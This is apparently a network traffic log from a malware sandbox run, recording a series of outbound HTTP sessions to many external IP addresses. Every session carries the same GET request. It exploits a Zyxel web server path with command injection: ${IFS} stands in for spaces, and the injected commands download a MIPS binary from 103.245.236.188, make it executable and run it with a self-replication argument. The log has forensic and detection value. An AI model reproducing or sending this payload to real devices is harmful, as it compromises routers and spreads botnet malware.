                                                Jan 12, 2024 18:16:40.857660055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8846192.168.2.2333862130.152.89.131443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.857713938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8847192.168.2.23422721.233.252.5443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.857754946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8848192.168.2.235756682.115.88.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.857810020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8849192.168.2.235067284.51.229.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.857822895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8850192.168.2.2333524159.153.226.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.857858896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8851192.168.2.2344648123.114.135.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.857897997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8852192.168.2.234010418.12.76.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.857929945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8853192.168.2.2357194107.121.170.111443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.857985973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8854192.168.2.2348612197.68.99.57443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.858030081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8855192.168.2.234276870.160.231.168443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.858067036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8856192.168.2.2352554130.221.136.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.858098984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8857192.168.2.235196218.133.123.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.858148098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8858192.168.2.2343872132.225.40.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.858186960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8859192.168.2.2337932162.0.59.210443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.858205080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8860192.168.2.234135034.147.83.223443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.858248949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8861192.168.2.2352720180.234.233.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.858293056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8862192.168.2.2358398128.192.36.15443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.858304977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8863192.168.2.2356666175.22.88.159443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.858369112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8864192.168.2.234380234.111.34.106443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.858401060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8865192.168.2.2352522149.113.194.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.858431101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8866192.168.2.2360396128.76.130.170443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.858467102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8867192.168.2.2333678189.85.7.54443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.858500004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8868192.168.2.235359625.226.133.23443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.858545065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8869192.168.2.2350676153.217.28.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.858561993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8870192.168.2.2341138109.141.23.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.858606100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8871192.168.2.2340966172.193.42.166443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.858659029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8872192.168.2.2355768176.23.179.48443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.858690023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8873192.168.2.233346263.28.198.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.858737946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8874192.168.2.235942298.38.125.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.858772993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8875192.168.2.235243689.90.54.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.858814955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8876192.168.2.2357206143.134.147.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.858848095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8877192.168.2.233985285.236.21.34443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.858906031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8878192.168.2.2347652162.190.237.4443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.858935118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8879192.168.2.2345500102.90.98.65443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.858968973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8880192.168.2.2342392161.106.199.165443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.859005928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8881192.168.2.235719665.238.184.121443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.859028101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8882192.168.2.2336382156.42.18.106443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.859086990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8883192.168.2.235900641.254.62.95443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.859127998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8884192.168.2.2350808191.220.216.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.859153032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8885192.168.2.2347542204.162.51.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.859193087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8886192.168.2.2338892177.116.60.83443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.859232903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8887192.168.2.233389627.109.112.6443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.859271049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8888192.168.2.2351052196.240.219.215443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.859303951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8889192.168.2.2349146156.248.132.95443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.859323978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8890192.168.2.2359310176.119.237.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.859352112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8891192.168.2.2337984150.172.233.67443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.859414101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8892192.168.2.2333648131.125.103.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.859456062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8893192.168.2.235957287.124.130.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.859497070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8894192.168.2.2352648212.19.199.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.859513998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8895192.168.2.2358878112.169.200.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.859565020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8896192.168.2.2349630139.127.23.115443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.859592915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8897192.168.2.2358096141.108.176.234443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.859611034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8898192.168.2.235169654.169.228.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.859664917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8899192.168.2.2341464211.121.205.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.859702110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8900192.168.2.23360302.6.77.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.859747887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8901192.168.2.2348104167.192.219.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.859787941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8902192.168.2.234775460.3.23.146443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.859839916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8903192.168.2.2336706219.71.218.5443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.859868050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8904192.168.2.2360618147.26.49.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.859903097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8905192.168.2.235342840.138.31.57443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.859958887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8906192.168.2.2360954146.121.137.40443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.859997034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8907192.168.2.233607282.182.63.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.860042095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8908192.168.2.235678252.83.100.82443
                                                TimestampBytes transferredDirectionData
